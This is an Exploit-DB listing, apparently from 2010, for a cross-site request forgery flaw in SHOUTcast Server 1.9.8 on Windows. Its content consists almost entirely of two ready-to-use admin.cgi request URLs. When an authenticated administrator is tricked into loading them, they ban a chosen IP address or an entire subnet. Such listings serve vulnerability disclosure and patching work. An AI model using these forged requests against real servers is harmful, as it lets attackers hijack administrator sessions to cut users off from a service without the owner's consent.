SHOUTcast Server 1.9.8/Win32 - Cross-Site Request Forgery

EDB-ID:

11215

CVE:

N/A

Author:

cp77fk4r

Type:

webapps

Platform:

Windows

Published:

2010-01-21

# Exploit Title: HOUTcast Server Version <= 1.9.8/win32 Cross Site Request Forgery.
# Date: 22/12/2009
# Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com<http://gmail.com>
# Software Link: http://www.shoutcast.com/download
# Version: X <= 1.9.8/win32
#
#[CSRF]:
Ban Single IP: (Ex: IP: p1.p2.p3.p4)
http://[URL]:8000/admin.cgi?mode=banip&ip1=[p1]&ip2=[p2]&ip3=[p3]&ip4=[p4]&banmsk=255

Ban Whole Subnet (Ex: IP: p1.p2.p3.0-255)
http://[URL]:8000/admin.cgi?mode=banip&ip1=[p1]&ip2=[p2]&ip3=[p3]&ip4=0&banmsk=0
#
#
#[E0F]